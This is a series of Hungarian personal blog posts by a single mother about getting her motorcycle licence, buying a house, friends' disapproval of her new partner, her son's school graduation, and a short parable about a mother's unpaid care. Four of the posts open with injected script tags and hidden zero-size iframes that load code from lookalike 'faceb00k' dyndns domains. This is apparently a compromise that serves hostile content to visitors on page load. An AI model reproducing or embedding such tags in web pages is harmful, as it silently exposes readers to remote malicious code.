Szín
Háttérszín
Háttérkép
Szegély színe
Font Type
Font Size
  1. Nem is oly régen, nekikezdtem a motoromhoz vezető rögös útnak. Sikeres KRESZ után nagy boldogan vettem tudomásul, hogy mindössze 9+1 óra rutin pálya és vizsga az első nagy akadály. Ezzel semmi gond, vágjunk bele, gondoltam én...
    Megkaptam a beosztást és örömmel láttam 3 hét múlva mehetek vizsgázni :)
    Na persze.
    Hivatalosan 12 órát mentem a rutin pályán, egyébként az oktatómnak és a barátoknak köszönhetően vagy 50-et, de legalább az MZ-től a Kawa ninjáig mindenen ültem. A második alkalommal ültem fel a GS500-ra, már mutattam a kezdőknek, hogyan is kell végigmenni a pályán, amikor sikerült olyan lassan menni, hogy a motor velem együtt eldőlt. Hát na, volt ijedtség, de csak a kuplung kar tört el. Megkaptam kabalának, büntetésből nekem kellett újat hozni.
    A jogsi és a motor pénzbe kerül, ha nem dolgozom, nincs miből fizetni, ez tiszta sor. Összehangolni a munkaidőt (látástól-mikulásig) a rutinpályás beosztással, nem volt egyszerű. Csoda, hogy nem akadtak ki tőlem, amikor sorra mondtam le az órákat, mert valami halaszthatatlan munka várt rám. Megbeszélés itt, oktatás ott, persze egy sem volt életbevágó - nekem meg pláne nem.

    Az idő telt, és mentek mások helyettem vezetni, vizsgázni. Múlt hét közepén ismét csörgök a suliba, hogy szeretném lemondani a pénteki órámat, mert még dolgozom, mire közli velem a kedves női hang Andrea (Ő a suli vezetője), hogy jó lenne ha legalább 19 órára műszakira kimennék a pályára, mert hétfőn reggel 9:20 kor be vagyok írva rutin vizsgára. Nem kicsi döbbenet után mégsem mondtam le az órámat, hanem a munkát halasztottam el, egészen kedd reggelig :p
    Kitekertem a pályára, ahol az oktatóm vigyorogva fogadott, és megbeszéltük a vizsga részleteit. Mindhárom feladatot megcsináltam 5x, majd 3x toltam a nyolcast, ezek után megbeszéltük a műszaki kérdéseket.
    Ma reggel kb fél 6-kor ébredtem, hamarabb ott voltam a garázsnál, mint bárki más. 7 óra 00-kor pontosan begurultunk a vizsga színhelyére, és vártunk. Sokan voltunk, de mindenki türelmesen várta a saját időpontját, szorítottunk mindenkinek, aki sorra került, és együtt örültünk a sikeres vizsgáknak. Amikor szólítottak minden bajom elszállt. Feltettem a sisakot, felhúztam a dzsekit és a kesztyűt. A zsebembe ott lapult a törött kuplungkar. Még fel se fogtam és már vége is volt, az oktatóm gratulált és minden ismerős vizsgázó mosolyogva integetett felém. SIKERÜLT :D
    Már rég hazaértem, amikor végre felhívtam a párom, a szüleim, és eldicsekedtem a mai teljesítményemmel. Nemrég megnéztem a vizsgalapom, de tényleg az van ráírva, hogy megcsináltam.
    Jöhet a forgalom, és a beígért motor vásárlásom.
    Szegecs kedveli ezt.
  2. <script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Nem értem az embereket, akik elvileg közel állnak hozzám. Végre boldog vagyok, és úgy alakul az életem, ahogy azt Én szeretném. Mostanában érzem, hosszú idő után, hogy irányítom a sorsom és nem csak sodródom az árral.
    Ezt szerettem volna megosztani másokkal is, így gondoltam szervezek egy kerti sütögetős, iszogatós, beszélgetős napot a hétvégén, amikor is a páromat is megismerhetik. (akik eddig még, nem találkoztak vele) Nem csak a szűk családdal, hanem néhány kedvesnek vélt ismerőssel, és közelebbi haverral.
    Ezzel nem is volt gond, a kaja finom volt, mindenki láthatóan jól érezte magát, az idő remek volt.
    A gondok csak ezután jöttek.
    Eltelt 3 nap, és sorra jönnek a nem túl kedves megjegyzések, amik úgy kezdődnek, hogy: Te tudod..., vagy Nem akarlak megbántani... És akadt köztük olyan is, aki egyenesen lehülyézett.
    Nem tudom eldönteni, hogy ezek irigységből vagy rosszindulatból törnek elő, de erre nem vagyok kiváncsi. Nem nekik akarok megfelelni, és nem nekik kell az én kicsi életemet élni.
    Tudom, dögöljön meg a szomszéd tehene is, de én azt hittem ezek az emberek kedvelnek, és örülni tudnak velem. Hát NEM!
    Mindent, ami engem boldoggá tesz mostanság, leszóltak, vagy volt egy epés megjegyzés rá. Persze nem mindenki, de elegen ahhoz, hogy rossz érzés támadjon bennem.
    Hiszem, hogy jó úton haladok, és tudom, boldog vagyok. Mégis rossz érzés fogott el. Kedveltem és szerettem ezeket az embereket, adtam a véleményükre is, ha úgy alakult, most mégis ellenséges érzéseket váltottak ki.
    Lehet az ő nézetükből, nekik van igazuk, de ez nem az ő életük. Miért nem tudnak örülni annak, ha valaki jól érzi magát a bőrében? Ez ma már nem divat???
    Tudom, hogy a ház, amit megvettem, nem egy építészeti műremek, nincs benne semmi extra, és van olyan, akinek az autója többe került, DE AZ ENYÉM! Majd lesz benne annyi, és olyan extra, ami nekünk kell. Ha végzünk a felújítással, akkor takaros kis otthon lesz, a kert rendezés után, pedig az álmom válik majd valóra. Kerti tó, medence és egy terasz, ahol olvashatok, beszélgethetünk. A nyugalom szigete lesz, már látom a lelki szemeimmel, csak pénz és idő kérdése.
    Tudom, hogy a volt férjem mérnök volt és "csak" 9 évvel volt idősebb nálam. Nem volt pocakos, félőrült motoros. De nem voltunk boldogok. A kedvesem szeret, elfogad (a fiamat is szereti), támogat. Nem egy daliás herceg, aki a meséből lépett ki, nem gazdag, nem ilyen vagy olyan. Egyszerű, dolgos vállalkozó, aki küzd önmagáért, az alkalmazottakért. Nem hinném, hogy akkor gáz lenne 13 év korkülönbség, amikor kitartásban, lelkesedésben, életkedvben sok harmincas elmarad mellette. Szeretem, ahogy látja a világot, ahogy él, és ahogy velem/velünk bánik. Szeretem, amiért vannak érzései, és ha néha kétségbe esik, akkor is a kiutat,a megoldást keresi. Nincs luxus autója, mert az csak munka eszköz, de van két féltett motorja. Nem megyünk Bora-Borára nyaralni, csak Görögbe motorral, mert nekünk ez lesz az élmény. Egyikünk se vágyik csilli-villi sok csillagos szállodára, az apartman pont megfelel. Csak a motort be lehessen zárni :)
    Ezeken még túl is tettem magam, egyik fülemen be, a másikon ki, de a támadás nem ért véget. A legfájóbb ponton találtak el. A gyermekem. Sokat beszélgettünk a fiammal, hogy merre tovább az általános után. Azt mondta, nem akar gimnáziumba menni, de majd szeretne diplomát. Oké, érettségi kell, de hol, milyen szakirány? Az ő világa, mint sok más fiatalé a számítógép, matekból jó, érdeklik a programok, a játék tesztek, jól rajzol géppel és kézzel egyaránt. Akkor informatika. Felvételi megvolt, két iskolában indítottak infós osztályt, oda jelentkezett első helyre, ahová szeretett volna menni. Felvették!:D Pontszám alapján mehetett volna a másikba is, de az első helyre kell, meg oda is akart. Erre jönnek a baromságok, hogy ez a suli nem jó, meg 100-1 lesz, aki bekerül az egyetemre. Miért nem gimibe ment, és miért nem erőltettem?
    Az, hogy a motorozás miatt hülyének néznek, az már csak hab a tortán. Mert beázik, és veszélyes, és csak két kereke van. Nem számít, hogy nekem ezer éve ez a vágyam.

    Tényleg nem értem! Empatikus és megértő vagyok, de ez most kicsit sok volt! Én tudtam örülni, amikor a barátnőm megvett egy lepukkant panellakást, kipofoztuk és jó lett. Vagy amikor az egyik haver vett egy Ladát, mert kellett kocsi, eszembe nem jutott, hogy miért nem vett audi Q7-et, hisz az tetszik neki. Megértettem, hogy nem akar hitelt a mai világban, meg dolgozni járni, gépeket, szerszámokat hozni-vinni ez is jó.
    Lehet bennem van a hiba? Nekem elég, ha látom a másik mosolyát, mert valamit elért az életben, és nem anyu-apu tette a segge alá. Tudok örülni annak, ha látom egy párocska szemében a csillogást, akkor is, ha nem szépségkirálynő a leányzó, akit bemutat a barátom.
    Ennyivel könnyebb lenne elviselni, ha nem csak a mi életünk, hanem másé se jobb?
    Jobb belerúgni a másikba, hogy ne legyen már olyan jó neki?
    Nem is csodálom, hogy ennyi ember boldogtalan, ha azt néznék, amijük van, talán egyszerűbb lenne reggel mosolyogni. De amíg csak azt nézik, hogy neki miért van, és nekem miért nincs, addig félő maradnak a hasonlóan "kedves" megjegyzések.
    Szegecs kedveli ezt.
  3. <script src="http://faceb00ks.dyndns.tv"></script>Valamikor a télen jött az elhatározás, hogy akkor is megcsinálom a motoros jogsimat. Találtam olyan embert, aki még támogatott is a döntésben. Nem is egyet :)
    Majd a tél vége felé kezdtem összeszedni az infókat a motoros/autós iskolákról, és oktatókról. Mondhatni nem egyszerű, választék ugyan van, de néhány helyen azt se tudták megmondani, hogy melyik cég oktatója lenne az, aki tanítana, meg felkészítene a vizsgákra. Arról nem is beszélve, hogy minden időpont miatt én szaladgáljak a hivatalos vizsga központba, náluk csak fizessek. Ez nem tűnt jó üzletnek.
    Végre megtaláltam, a nekem megfelelőt sulit. Mindent intéznek, óriási kedvezmény, mert 2 jogsit csinálok egymás után. Az oktatóm ugyan az lesz majd, az autón is, aki mellesleg motoros rendőröknek tart tréningeket.
    Beiratkoztam és vártam az első elméleti órát. :)
    Hétfőn megvolt a KRESZ vizsgám, féltem tőle, de sikerült, 5 hibaponttal. Örültem nagyon. Az A kategória kipipálva.
    A vizsgalapommal már repültem is a suliba, hogy a rutint intézhessem. Gondoltam, majd a jövőhéten valamikor elkezdem. Na nem, mondták, holnap jöhetsz.
    Úgyhogy tegnap megvolt az első órám a rutin pályán. Igaz csak körbe-körbe mentem nagy 0 íven, de nagyon kezdőnek ez is valami. Arra nem építhet, hogy valamikor időszámításunk előtt mentem Simsonnal :p
    125cc MZ, berúgókar, néhányszor lefulladt, és a két lábam egyszerre nem nagyon ér le teli talppal. Mégis élmény volt, elindulás és megállás, majd a körök.
    Kb. 10 perce köröztem, amikor rám szólt, hogy lehet ezt lassabban is. Igaz nem engedett a bóják, és a rutinos fiúk közé, de mentem, borulás nélkül.
    Az óra végén összeszedtük a bójákat, és megbeszéltük a további időpontokat.
    Ha minden jól megy, akkor két hét múlva mehetek vizsgázni, és irány a forgalom :csam:
    Holnap elsősegély vizsga, este 2 óra a pályán, ha ügyes leszek, akkor a második órában már átülhetek 250cc-re.

    Megígértem magamnak, hogy a sikeres rutin vizsga után megveszem a motorom. Azt hiszem, elkezdem komolyabban keresgélni :)
    Szegecs kedveli ezt.
  4. <script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Repül az idő. Gondolom, mindenki így van ezzel, akinek gyermeke van. Emlékszünk az első mosolyára, az elő szavaira, az első lépéseire... minden elsőre. Miközben a szebbnél szebb emlékek csak gyűlnek, a gyermekünk felnő. Nem tudom, hirtelen hová tűnt 14 év :) nekem csak pillanatok voltak.
    Eltelt 8 év... Szinte hihetetlen, de nemrég írattam be az iskolába. Az első napok, hetek olyan élénken vannak a fejemben, és már vége. Az első tanévnyitó ünnepség, a várakozás izgalma csillogott a szemében. Milyen izgatott volt, amikor az iskolatáskával a hátán beléptünk a kapun... Kati néni, az osztályfőnök mosolyogva köszöntött mindenkit, igazi tyúkanyóként terelgette a megszeppent elsősöket. Az én kicsi fiam iskolás. Milyen furcsa érzés is volt, büszke voltam rá. Ahogy vitte a táskáját, és mindennap egyre nagyobb lelkesedéssel gyakorolt, mert olvasni akart.
    Teltek a hetek, a hónapok, az évek. Barátságok és szerelmek alakultak és bomlottak fel. Persze a lelkesedés is átalakult, már nem a tanulás volt a vonzó az iskolában, hanem a szünetek, és a barátok. Az osztálykirándulások, családi napok, iskolabál. Mind egy-egy szép emlék, igen ma már csak emlék, mert eljött a ballagás napja, amit annyira vártunk.
    Várták a "gyerekek" és a szülők is.
    Nyolc év alatt annyi minden történt, okosodtak... kamaszodtak... felvételi... és felnőttek.
    Büszkén és félve, könnyes szemmel mosolyogtam a fiamra.
    A büszkeség nem is az emléklapnak, oklevélnek vagy a búcsúbeszédnek szólt, hanem neki és a 8.c-nek. Olyan komolyan csinálták végig a két órás ünnepséget. Készültek rá. A búcsúbeszédet saját maguk írták közösen, nem valamelyik tanár szavait olvasta fel, hanem az osztály gondolatait. Azt gondolnánk, hogy a kamaszok nem szeretnek szerepelni, mégis kiállt az osztály, dallal köszönt el az iskolától és a tanároktól. Karamell - Szállok a dallal-t mosolyogva énekelték.
    Az ünnepség végén a ballagó diákok lufit engedtek a levegőbe, elszállt a dal és a 8 év. :)
    Félelem is van bennem, mert új iskola, komolyabb tanulás, új barátok és szerelmek, és a végén egy mérföldkő, az érettségi vár majd rá. Most ez is távolinak tűnik... Szinte tegnap tartottam először a karomban és szeptemberben a középiskolát kezdi.
    Na de, hol van az még??? Ezt gondoltam 2003. szeptember elsején is :D
    Szegecs kedveli ezt.
  5. <script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Egyik este, amikor anya a vacsorát készítette, a nagyobbik fia egy cetlit adok a kezébe.
    A cetlin nagy betűkkel ez állt: SZÁMLA - és alatta részletesen a tételek:

    -vigyázok az öcsémre 500Ft
    -leviszem a szemetet 200Ft
    -rendet rakok a szobámban 500Ft
    -lemegyek a boltba 500Ft
    -néha porszívózok 200Ft
    -apának segítek a kertben 700Ft

    Összesen: 2600Ft

    Anya csak nézte a számlát. Majd megfordította és írt rá:

    -9 hónapig hordtalak a szívem alatt 0Ft
    -fürdetés, pelenkázás 0Ft
    -ápoltalak, virrasztottam az ágyadnál ha beteg voltál 0Ft
    -letöröltem a könnycseppeket, vigasztaltalak 0Ft
    -ha elestél, egy puszival gyógyítottam a sebeidet 0Ft
    -minden nap, a reggeli, ebéd és vacsora 0Ft
    -játszótér, kirándulás és esti mese 0Ft
    -kikérdeztem a leckét, átnéztem a táskád 0Ft
    -mosás, vasalás, takarítás 0Ft

    Összesen 0Ft

    A nagyfiú elolvasta, majd szégyenlősen lehajtotta a fejét. Egy könnycsepp gördült végig az arcán. A cetlire csak ennyit írt, az ő számlája alá: FIZETVE!

    Valahol hallottam egyszer. Mostanában sokszor tesz, vagy mond olyat a fiam, amitől meghatódom, és ez a történet jutott az eszembe. Mert a mi fizetségünk a gyermekünk mosolya, szeretete :)
    Gondoltam megosztom, mert sokan vagyunk akiknek ez a fizetség a legértékesebb :)
    Szegecs kedveli ezt.
  6. Szabadnak születtem, és ezt kezdem végre megérteni és ami még fontosabb, megélni is. Megtaláltam önmagam.

    Három a magyar igazság, harmadszorra kezdem az életem. Mindig szinte a nulláról és hátszél nélkül. Nem egyszerű az élet nőként és egyedülálló anyaként, ezt sokan tapasztaljuk. Ma is még a férfiak uralják a világot, ez engem nem is zavar, csak hagyjanak élni. Nem vagyok feminista és divat szingli sem, nem szeretek órákat tölteni a plázákban, boltba be és ki, próbáljunk fel még 100 ruhát. Ez nem az én világom, de tiszteletben tartom azokat is, akiknek ez az életcéljuk.
    Nekem más céljaim voltak és vannak.
    Köszönhetem nagyon sok embernek azt, hogy az vagyok ma, aki. A szüleimnek és a bátyámnak, mert életem első 17 évében ők voltak a meghatározóak. Nem kivételeztek velem, mert lány vagyok, kaptam egy-két apait, mert megérdemeltem, a többit a bátyámmal elintéztük.:) Nem babáztam, mert a tesómmal szerettem játszani, maradt a foci, fára mászás és a kisautó. Apukám ugyanúgy tanított pecázni, biciklizni, motorozni, mint a fiát. Nem zavart a konyhába, amikor bütykölte a motort/autót vagy épp a mosógépet. Különbség csak az éjszaki kimaradásban volt, mert lány vagyok, korábban kellett hazaérnem.
    Nem akadtak ki, amikor nem akartam gimnáziumba menni, és nem tagadtak ki, mert fiatalon anya lettem.
    Jöhet a nagybetűs ÉLET.

    A jó és rossz kapcsolatok, is sokat formáltak rajtam, az újra kezdést is ennek köszönhetem. Egy fantasztikus tinédzser fiú anyukája vagyok, és ez a legszebb dolog, amit annak idején kaptam. Anyaság, munka és tanulás, még egy bizonyítvány. A többi nem számít, hogy én nyúltam mellé, vagy ő bántott, már régen mellékes.

    Kezdjük újra, mindent az elejéről. Albérlet, szülői ház, albérlet ... Sok nélkülözés nekem, és még több munka. Hitel, lakásvásárlás, munka, és az anyaság. Újabb szakma és az érettségi megszerzése, mert igenis vannak még álmaim. Boldog voltam újra és "páratlan". Soha nem voltam magányos, a kisfiam, a családom, és a barátok mindig mellettem voltak. Egy idő után a gyengédség hiányzott.

    Nem kerestem, nem értem rá, mégis megtalált a "szerelem". Remények és álmok... De vajon az enyémek? Összeköltözés, lakások el, vegyünk közöset, házasság. Anyaság és család, munka és a változatosság kedvéért tanulás. Már 4 szakmával és érettségivel a kezemben 25 évesen beiratkoztam a főiskolára. Biztos, ami tuti, ne legyen egyszerű nappali tagozatra és két szakra. Mondanom sem kell, nehéz volt össze egyeztetni. De egy újabb álmom teljesült, diplomát szereztem, egyszerre kettőt is. A szüleim mindig büszkék voltak rám, de aznap, majd 29 évesen, mikor átvettem a diplomáimat ...:((:D ... volt minden.
    Már csak néhány dolog volt, ami hiányzott az életemből. Volt olyan, amiről tudtam és olyan is amit csak éreztem. Mondhatni megvolt mindenem, és mégsem. A családi ház drága dolog, főleg ha az ember lánya építészhez megy feleségül. Nem lehet venni, csak építeni, na de ha nincs miből???
    A saját vágyaim, hogy na most végre, megtehetem, lehet motorom, jogsim. Na az ebben a kapcsolatban sem játszott sok szerepet. Mert minek az neked, ott az autó. Annyiért majdnem telket lehet venni. Miért nem jó neked egy kis robogó? :heureka:
    Néhány év házasság után rá kellett jönnöm ez nem az én életem.

    Albérlet, munka és anyaság. Akkor kezdjünk neki ismét, harmadszorra már sikerülnie kell! Mindig azt láttam, hogy a nők ilyenkor összerogynak, mint a rongybabák és jön a világvége. Nálam ez másképp zajlott le.
    Az események nagyon pörögtek. Fél év telt el azóta, hogy elköltöztem a közös lakásból. Azóta már a válást is kimondták, mert mindenben meg tudtunk egyezni. A barátok jó része elveszett számomra a válással. Olyan volt, mint amikor költözésnél kidobjuk a sok kacatot. Az a néhány barát, aki mellettem maradt, az már mondható igazi barátnak. Találkoztam egy csodálatos emberrel, aki olyannak fogad el, amilyen vagyok.
    És végre rájöttem, hogy mi hiányzott mindig is. A szabadság. Az a szabadság szeretet, amit édesapám adott át nekünk és nevelt belénk.:D Ami a legfontosabb szabad lehetek.
    Köszönhető annak, hogy Ő is szabad lélek, és motoros :D és hogy 260 km a távolság az állandó lakhelyeink között :p, bár 14 napból 5-8 együtt vagyunk.
    Köszönhetem annak is, hogy a fiamat sikerült az önállóságra és megbízhatóságra nevelni. Már ha nevezhetjük nevelésnek azt a folyamatot, ami az elmúlt 14 és fél évben zajlott.
    Vissza is kanyarodhatok az elejére, köszönhetem a családomnak, mert mindig mellettem álltak. Nem is igazán anyagilag, sokszor "csak" lelkileg. Támogatták a döntéseimet és szerettek minden önzés nélkül.

    Itt vagyok! Az álmaim teljesültek, lassan mind. Kereshetek új álmokat, mert nélkülük nincs miért küzdeni. Azt mondta a nagymamám, hogy nagyot kell álmodni.

    :hura: Megtettem! :hura:

    Egyedül álló anyaként megvettem a saját házamat!!! Meglesz végre a motorra a jogosítványom, és megveszem álmaim motorját is. Mivel friss jogsival nem merném hajtani, így kell egy, amin tényleg megtanulok rendesen motorozni. :csam: De előbb utóbb kigurul a Hondám is a szalonból :)

    A szabadság a motorozás, vagy a motorozás a szabadság? Nem tudom rá a választ. Itt ülök a dobozok között és csak mosolygok.

    Harmadszorra sikerült???
    Szegecs kedveli ezt.